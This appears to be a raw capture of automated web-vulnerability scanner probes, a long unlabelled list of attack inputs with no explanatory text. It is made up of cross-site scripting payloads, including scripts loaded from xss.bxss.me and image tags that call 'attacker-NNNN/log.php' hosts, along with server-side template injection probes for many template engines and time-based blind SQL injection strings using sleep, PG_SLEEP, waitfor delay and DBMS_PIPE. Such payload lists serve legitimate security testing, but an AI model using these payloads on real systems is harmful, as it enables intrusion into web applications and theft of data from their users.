1}}dfb{{98991*97996}}xca

555<script>qXNJ(9446)</script>

<a HrEF=http://xss.bxss.me></a>

555NzCfz <ScRiPt >Rn7L(9946)</ScRiPt>

555<W1JJMT>CMECJ[!+!]</W1JJMT>

<th:t="${dfb}#foreach

555<input autofocus onfocus=C2iz(9387)>

<a HrEF=http://xss.bxss.me></a>

'}dfb{98991*97996}xca

555<WUFJRL>H328A[!+!]</WUFJRL>

555w3YUc <ScRiPt >Vb8t(9529)</ScRiPt>

555<ifRAme sRc=9942.com></IfRamE>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555zspK1 <ScRiPt >juyC(9864)</ScRiPt>

1}}dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555

dfb{{98991*97996}}xca

555}body{zzz:Expre/**/SSion(DW9d(9901))}

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

555<script>qXNJ(9008)</script>9008

%35%35%35%3C%53%63%52%69%50%74%20%3E%42%4C%46%78%289530%29%3C%2F%73%43%72%69%70%54%3E

555}body{zzz:Expre/**/SSion(8JQq(9420))}

555

'}dfb${98991*97996}xca

555<ifRAme sRc=9050.com></IfRamE>

<a HrEF=http://xss.bxss.me></a>

1%}dfb{{98991*97996}}xca

555<WSXED4>J4LBW[!+!]</WSXED4>

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=jaVaScRiPT:>

5551YbMn <ScRiPt >8JQq(9516)</ScRiPt>

555<ScR<ScRiPt>IpT>qXNJ(9818)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

555<WHATUA>NXODB[!+!]</WHATUA>

555<aMluGZ3 x=9036>

555

555<WW4A4A>CVJQW[!+!]</WW4A4A>

555<input autofocus onfocus=T1o9(9029)>

1%}dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

555}body{zzz:Expre/**/SSion(ywDF(9632))}

'}dfb#{98991*97996}xca

555\u003CScRiPt\BLFx(9208)\u003C/sCripT\u003E

555<WPGQST>EVIF2[!+!]</WPGQST>

1}dfb{98991*97996}xca

555<WJU6NK>V7WXJ[!+!]</WJU6NK>

<a HrEF=jaVaScRiPT:>

<a HrEF=jaVaScRiPT:>

555<ifRAme sRc=9537.com></IfRamE>

dfb[[${98991*97996}]]xca

555q8rjq <ScRiPt >DW9d(9526)</ScRiPt>

555}body{zzz:Expre/**/SSion(dGnL(9522))}

555<ifRAme sRc=9213.com></IfRamE>

555<aesT4yr x=9419>

555}body{zzz:Expre/**/SSion(3LuS(9108))}

5559rVb6 <ScRiPt >ywDF(9523)</ScRiPt>

555<WKRP2Z>PKOL3[!+!]</WKRP2Z>

555<ifRAme sRc=9745.com></IfRamE>

555}body{zzz:Expre/**/SSion(n44n(9327))}

1}dfb${98991*97996}xca

555<ifRAme sRc=9696.com></IfRamE>

555}body{zzz:Expre/**/SSion(41MI(9295))}

555&lt

dfb{{98991*97996}}xca

<a HrEF=http://xss.bxss.me></a>

555<img sRc='http://attacker-9131/log.php?

'}dfb{#98991*97996}xca

555<ScRiPt >qXNJ(9580)</ScRiPt>

555

dfb__${98991*97996}__::.x

555<aq6xWYc x=9916>

555}body{zzz:Expre/**/SSion(C2iz(9503))}

555GWgLh <ScRiPt >dGnL(9870)</ScRiPt>

1}dfb{98991*97996}xca

555<W24E7F>4APLZ[!+!]</W24E7F>

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9429/log.php?

555<WXDRYX>Z1KLA[!+!]</WXDRYX>

1}dfb#{98991*97996}xca

555}body{zzz:Expre/**/SSion(Yu7W(9473))}

555t73T0 <ScRiPt >n44n(9017)</ScRiPt>

555<ifRAme sRc=9075.com></IfRamE>

555<ifRAme sRc=9404.com></IfRamE>

dfb[[${98991*97996}]]xca

555<ifRAme sRc=9529.com></IfRamE>

555<ax8C5SN x=9794>

555<WEE8WK>RZKYA[!+!]</WEE8WK>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<aY7s3rN x=9851>

555<img sRc='http://attacker-9243/log.php?

555<aBTTHUR<

5558KLvw <ScRiPt >3LuS(9288)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9219></ScRiPt>

'}dfb{@98991*97996}xca

555<ifRAme sRc=9705.com></IfRamE>

\xf6<img zzz onmouseover=BLFx(96021) //\xf6>

555<aNJWRxP<

555<a09uTxC x=9884>

1}dfb${98991*97996}xca

555aByu4 <ScRiPt >41MI(9161)</ScRiPt>

555<ifRAme sRc=9661.com></IfRamE>

"}}dfb{{98991*97996}}xca

1}dfb{#98991*97996}xca

555<ScRiPt >rt12(9581)</ScRiPt>

dfb[[${98991*97996}]]xca

555<WPW85J>HV5TJ[!+!]</WPW85J>

555<ScRiPt >qXNJ(9933)</ScRiPt>

555<img sRc='http://attacker-9464/log.php?

555oijgz <ScRiPt >C2iz(9315)</ScRiPt>

555JrZIj <ScRiPt >Yu7W(9726)</ScRiPt>

'}}dfb{{=98991*97996}}xca

555<abnBMEL x=9802>

dfb__${98991*97996}__::.x

555<aXxDPM2 x=9911>

555}body{zzz:Expre/**/SSion(T1o9(9972))}

555<aHtMTGK x=9420>

555<img sRc='http://attacker-9186/log.php?

555<WOJLBG>1DNZ5[!+!]</WOJLBG>

555<ifRAme sRc=9459.com></IfRamE>

555<img sRc='http://attacker-9478/log.php?

555<WSMYGN>0A5A3[!+!]</WSMYGN>

555<a2iFdPq<

555<WTTS3T>6TJCO[!+!]</WTTS3T>

dfb__${98991*97996}__::.x

555<atNotYE x=9008>

555<svg  \xa0onload=qXNJ(9354)

"%}dfb{{98991*97996}}xca

1}dfb{@98991*97996}xca

1}dfb#{98991*97996}xca

')dfb@(98991*97996)xca

555<WOCP1R>AXBG6[!+!]</WOCP1R>

555<aV3ySHr x=9840>

555<input autofocus onfocus=BLFx(9243)>

555<al5RFzh x=9475>

555<aWySt61<

555<img sRc='http://attacker-9088/log.php?

555<ifRAme sRc=9320.com></IfRamE>

555vS7q7 <ScRiPt >T1o9(9120)</ScRiPt>

555<img sRc='http://attacker-9525/log.php?

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

'%>dfb<%=98991*97996%>xca

555<ifRAme sRc=9605.com></IfRamE>

555<script>rt12(9018)</script>

555<WNF3C6>GEUXM[!+!]</WNF3C6>

555<img sRc='http://attacker-9171/log.php?

555<isindex type=image src=1 onerror=qXNJ(9356)>

555<img sRc='http://attacker-9780/log.php?

1}dfb{#98991*97996}xca

"}dfb{98991*97996}xca

555<ifRAme sRc=9659.com></IfRamE>

555<img sRc='http://attacker-9428/log.php?

555<ifRAme sRc=9548.com></IfRamE>

555<aDqElLY x=9435>

555<aJslroU<

555<aqRhAxL<

555<aK6xP6P<

555<img sRc='http://attacker-9767/log.php?

1}}dfb{{=98991*97996}}xca

555<aXtEUyV<

555<WFQGNY>NYAZS[!+!]</WFQGNY>

555<ifRAme sRc=9242.com></IfRamE>

<a HrEF=http://xss.bxss.me></a>

555<acba5RK x=9827>

"}dfb${98991*97996}xca

555<amBGGmu<

555<awWgjpL<

555<aO0bge3 x=9776>

555<aVZSioX<

555<script>rt12(9082)</script>9082

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ScRiPt >6Wwb(9957)</ScRiPt>

555<img sRc='http://attacker-9525/log.php?

1)dfb@(98991*97996)xca

"}dfb#{98991*97996}xca

'}dfb#set($x=98991*97996)${x}xca

555<ifRAme sRc=9058.com></IfRamE>

555<iframe src='data:text/html

1}dfb{@98991*97996}xca

555<ar11QMP x=9150>

555<img sRc='http://attacker-9810/log.php?

'}dfb{{"abc"|title}}xca

555<aLV6r9n<

555<img sRc='http://attacker-9641/log.php?

1%>dfb<%=98991*97996%>xca

"}dfb{#98991*97996}xca

555<awLs9Oy<

555<ScRiPt >KFvT(9899)</ScRiPt>

555<WSD25O>C9C05[!+!]</WSD25O>

555<img sRc='http://attacker-9335/log.php?

555<ScR<ScRiPt>IpT>rt12(9627)</sCr<ScRiPt>IpT>

555

555<ag1JZAo x=9391>

555<ayry7Nx<

555<aNlcJoE x=9937>

555<aU3qGgT<

555<ScRiPt >rt12(9994)</ScRiPt>

1}dfb#set($x=98991*97996)${x}xca

555'"()&%<zzz><ScRiPt >cSGa(9023)</ScRiPt>

'print("dfb" . 98991*97996 . "xca")

555<a1MjYT4<

<a HrEF=jaVaScRiPT:>

555'"()&%<zzz><ScRiPt >aJyU(9526)</ScRiPt>

555'"()&%<zzz><ScRiPt >N8Tq(9123)</ScRiPt>

555<W4WY9H>GRW39[!+!]</W4WY9H>

"}dfb{@98991*97996}xca

555<body onload=qXNJ(9045)>

1}}dfb{{=98991*97996}}xca

555<script>6Wwb(9964)</script>

555'"()&%<zzz><ScRiPt >my9N(9136)</ScRiPt>

555}body{zzz:Expre/**/SSion(BLFx(9581))}

555<img sRc='http://attacker-9223/log.php?

555'"()&%<zzz><ScRiPt >Jufl(9047)</ScRiPt>

555<script>6Wwb(9184)</script>9184

1)dfb@(98991*97996)xca

'98991*97996*98991*97996

555'"()&%<zzz><ScRiPt >I49Q(9204)</ScRiPt>

555'"()&%<zzz><ScRiPt >J4zr(9765)</ScRiPt>

555<img sRc='http://attacker-9168/log.php?

555'"()&%<zzz><ScRiPt >Ux6l(9295)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=qXNJ(9182)>

555'"()&%<zzz><ScRiPt >Mbhw(9098)</ScRiPt>

555'"()&%<zzz><ScRiPt >hzFk(9395)</ScRiPt>

'"()&%<zzz><ScRiPt >aJyU(9257)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9926></ScRiPt>

"}}dfb{{=98991*97996}}xca

555'"()&%<zzz><ScRiPt >704t(9048)</ScRiPt>

1}dfb{{"abc"|title}}xca

'"()&%<zzz><ScRiPt >N8Tq(9557)</ScRiPt>

'"()&%<zzz><ScRiPt >my9N(9775)</ScRiPt>

555'"()&%<zzz><ScRiPt >FIFz(9980)</ScRiPt>

555'"()&%<zzz><ScRiPt >SNa3(9677)</ScRiPt>

'"()&%<zzz><ScRiPt >cSGa(9207)</ScRiPt>

'"()&%<zzz><ScRiPt >I49Q(9008)</ScRiPt>

'"()&%<zzz><ScRiPt >Ux6l(9943)</ScRiPt>

'"()&%<zzz><ScRiPt >hzFk(9653)</ScRiPt>

555<aTq4DNq<

555Gxutl <ScRiPt >BLFx(9125)</ScRiPt>

555<script>KFvT(9021)</script>

'"()&%<zzz><ScRiPt >Mbhw(9543)</ScRiPt>

'"()&%<zzz><ScRiPt >J4zr(9678)</ScRiPt>

555<ScR<ScRiPt>IpT>6Wwb(9463)</sCr<ScRiPt>IpT>

555<ScRiPt >rt12(9957)</ScRiPt>

555'"()&%<zzz><ScRiPt >6Xny(9305)</ScRiPt>

555<img src=xyz OnErRor=qXNJ(9075)>

555<aZh67yn<

5559042082

'"()&%<zzz><ScRiPt >FIFz(9601)</ScRiPt>

'"()&%<zzz><ScRiPt >Jufl(9046)</ScRiPt>

1%>dfb<%=98991*97996%>xca

5559993136

'}dfb{@math key=98991 method="multiply" operand=97996/}xca

'"()&%<zzz><ScRiPt >SNa3(9434)</ScRiPt>

5559961182

5559339213

555'"()&%<zzz><ScRiPt >GWjk(9737)</ScRiPt>

")dfb@(98991*97996)xca

5559685821

5559879400

555<svg  \xa0onload=rt12(9063)

1print("dfb" . 98991*97996 . "xca")

555<ScRiPt >6Wwb(9522)</ScRiPt>

'"()&%<zzz><ScRiPt >704t(9832)</ScRiPt>

5559449449

5559503474

5559002051

5559148506

bfg4682\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4682

555<WW5AHB>DPCX3[!+!]</WW5AHB>

555<script>KFvT(9790)</script>9790

'}}}dfb{{{this}}}xca

5559842111

'"()&%<zzz><ScRiPt >6Xny(9412)</ScRiPt>

5559639173

555<img/src=">" onerror=alert(9242)>

555'"()&%<zzz><ScRiPt >ZcGN(9708)</ScRiPt>

1}dfb#set($x=98991*97996)${x}xca

"%>dfb<%=98991*97996%>xca

bfg4847\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4847

bfg6587\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6587

5559193802

bfg9580\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9580

'"()&%<zzz><ScRiPt >GWjk(9443)</ScRiPt>

198991*97996*98991*97996

bfg4845\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4845

555<isindex type=image src=1 onerror=rt12(9109)>

bfg4855\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4855

bfg8000\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8000

5559780174

bfg8562\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8562

bfg6378\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl6378

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9990></ScRiPt>

bfg7194\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7194

bfg2824\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2824

bfgx2534\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2534

555<iframe src='data:text/html

bfg9615\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl9615

%35%35%35%3C%53%63%52%69%50%74%20%3E%71%58%4E%4A%289666%29%3C%2F%73%43%72%69%70%54%3E

'}#{98991*97996*98991*97996}

555<ScR<ScRiPt>IpT>KFvT(9657)</sCr<ScRiPt>IpT>

bfgx3042\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3042

'"()&%<zzz><ScRiPt >ZcGN(9546)</ScRiPt>

1}dfb{{"abc"|title}}xca

"}dfb#set($x=98991*97996)${x}xca

555<ifRAme sRc=9967.com></IfRamE>

bfg5857\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5857

bfgx1154\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1154

bfgx8441\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8441

bfgx9670\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9670

bfgx7738\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7738

bfgx6146\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6146

1}dfb{@math key=98991 method="multiply" operand=97996/}xca

<%={{={@{#{${dfb}}%>

bfgx6409\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6409

bfgx10363\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10363

555<ScRiPt >6Wwb(9928)</ScRiPt>

555<body onload=rt12(9996)>

bfgx3280\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3280

bfgx9246\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9246

5559120299

5559552877

bfg3283\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3283

555<ScRiPt >KFvT(9695)</ScRiPt>

bfgx5863\xc0\xbez1\xc0\xbcz2a\x90bcxhjl5863

555\u003CScRiPt\qXNJ(9324)\u003C/sCripT\u003E

<%={{={@{#{${dfb}}%>

1}}}dfb{{{this}}}xca

'}dfb#{xca}=123

555<aDiME3J x=9510>

555

<%={{={@{#{${dfb}}%>

bfgx4644\xc0\xbez1\xc0\xbcz2a\x90bcxhjl4644

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555<svg  \xa0onload=6Wwb(9783)

555<img src=//xss.bxss.me/t/dot.gif onload=rt12(9948)>

bfgx9126\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9126

<%={{={@{#{${dfb}}%>

555

bfg10238\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl10238

1print("dfb" . 98991*97996 . "xca")

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555

bfg8268\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl8268

"}dfb{{"abc"|title}}xca

1}#{98991*97996*98991*97996}

<%={{={@{#{${dfb}}%>

555&lt

555<img sRc='http://attacker-9011/log.php?

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

<%={{={@{#{${dfb}}%>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9233></ScRiPt>

555<img src=xyz OnErRor=rt12(9621)>

555

555

bfgx10968\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10968

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

1}dfb#{xca}=123

<th:t="${dfb}#foreach

'}}dfb{{'abcd'.toUpperCase()}}xca

555

555

198991*97996*98991*97996

bfgx10801\xc0\xbez1\xc0\xbcz2a\x90bcxhjl10801

555

555

\xf6<img zzz onmouseover=qXNJ(92031) //\xf6>

555<img/src=">" onerror=alert(9716)>

555

555<isindex type=image src=1 onerror=6Wwb(9428)>

"print("dfb" . 98991*97996 . "xca")

555

<th:t="${dfb}#foreach

555

555<ajt2Nlx<

<th:t="${dfb}#foreach

555

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

'}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

555

<th:t="${dfb}#foreach

<th:t="${dfb}#foreach

1}}dfb{{'abcd'.toUpperCase()}}xca

555<iframe src='data:text/html

555

<th:t="${dfb}#foreach

"98991*97996*98991*97996

555

<th:t="${dfb}#foreach

555<ScRiPt >KFvT(9155)</ScRiPt>

1}dfb{@math key=98991 method="multiply" operand=97996/}xca

555

'}}dfb{{98991*97996}}xca

<th:t="${dfb}#foreach

555

<%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

555

555<input autofocus onfocus=qXNJ(9008)>

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<body onload=6Wwb(9202)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%72%74%31%32%289814%29%3C%2F%73%43%72%69%70%54%3E

555

<th:t="${dfb}#foreach

"}dfb{@math key=98991 method="multiply" operand=97996/}xca

555<svg  \xa0onload=KFvT(9104)

555

555

555

555

1}}}dfb{{{this}}}xca

1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

'}dfb[[${98991*97996}]]xca

555

<th:t="${dfb}#foreach

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=6Wwb(9034)>

555

555

555<isindex type=image src=1 onerror=KFvT(9123)>

<th:t="${dfb}#foreach

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

"}}}dfb{{{this}}}xca

555\u003CScRiPt\rt12(9946)\u003C/sCripT\u003E

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555mgHizGQT

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1}#{98991*97996*98991*97996}

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

dfb{{98991*97996}}xca

-1 OR 2+635-635-1=0+0+0+1 --

555<img src=xyz OnErRor=6Wwb(9416)>

'dfb__${98991*97996}__::.x

1}}dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555&lt

-1 OR 2+797-797-1=0+0+0+1

555

555

-1' OR 2+671-671-1=0+0+0+1 --

555<iframe src='data:text/html

555

555}body{zzz:Expre/**/SSion(qXNJ(9199))}

555

-1' OR 2+538-538-1=0+0+0+1 or 'YpuCS3NX'='

"}#{98991*97996*98991*97996}

dfb{98991*97996}xca

dfb{{98991*97996}}xca

-1" OR 2+727-727-1=0+0+0+1 --

555

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555

555*if(now()=sysdate(),sleep(15),0)

\xf6<img zzz onmouseover=rt12(92411) //\xf6>

1}dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z

1}dfb#{xca}=123

555

555<img/src=">" onerror=alert(9143)>

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555

dfb[[${98991*97996}]]xca

555

dfb${98991*97996}xca

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

dfb{{98991*97996}}xca

555rglYU <ScRiPt >qXNJ(9418)</ScRiPt>

555-1

dfb{{98991*97996}}xca

"}dfb#{xca}=123

555<body onload=KFvT(9702)>

dfb{{98991*97996}}xca

555-1)

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

555<input autofocus onfocus=rt12(9157)>

555-1 waitfor delay '0:0:15' --

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

dfb#{98991*97996}xca

555A07hYC2B'

555-1 OR 915=(SELECT 915 FROM PG_SLEEP(15))--

1}}dfb{{'abcd'.toUpperCase()}}xca

555-1) OR 35=(SELECT 35 FROM PG_SLEEP(15))--

%35%35%35%3C%53%63%52%69%50%74%20%3E%36%57%77%62%289340%29%3C%2F%73%43%72%69%70%54%3E

dfb{{98991*97996}}xca

1dfb__${98991*97996}__::.x

555

1}}dfb{{98991*97996}}xca

555-1)) OR 992=(SELECT 992 FROM PG_SLEEP(15))--

dfb[[${98991*97996}]]xca

555

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

<a HrEF=http://xss.bxss.me></a>

555YqZl0wzt' OR 620=(SELECT 620 FROM PG_SLEEP(15))--

dfb[[${98991*97996}]]xca

555\u003CScRiPt\6Wwb(9651)\u003C/sCripT\u003E

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

dfb[[${98991*97996}]]xca

555<WNTZO7>YKWZW[!+!]</WNTZO7>

dfb{{98991*97996}}xca

dfb{#98991*97996}xca

dfb[[${98991*97996}]]xca

555ihLpoUPD') OR 633=(SELECT 633 FROM PG_SLEEP(15))--

555<img src=//xss.bxss.me/t/dot.gif onload=KFvT(9126)>

dfb[[${98991*97996}]]xca

"}}dfb{{'abcd'.toUpperCase()}}xca

dfb__${98991*97996}__::.x

555dlbyQRop')) OR 935=(SELECT 935 FROM PG_SLEEP(15))--

dfb__${98991*97996}__::.x

<a HrEF=jaVaScRiPT:>

1}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

1%}dfb{{98991*97996}}xca

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

dfb{{98991*97996}}xca

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555&lt

555

555'"

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{@98991*97996}xca

555<ifRAme sRc=9698.com></IfRamE>

555\xc0\xa7\xc0\xa2%2527%2522\'\"

1}dfb{98991*97996}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

@@QjCFF

dfb__${98991*97996}__::.x

555<ScRiPt >0NOx(9233)</ScRiPt>

555

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb__${98991*97996}__::.x

dfb__${98991*97996}__::.x

555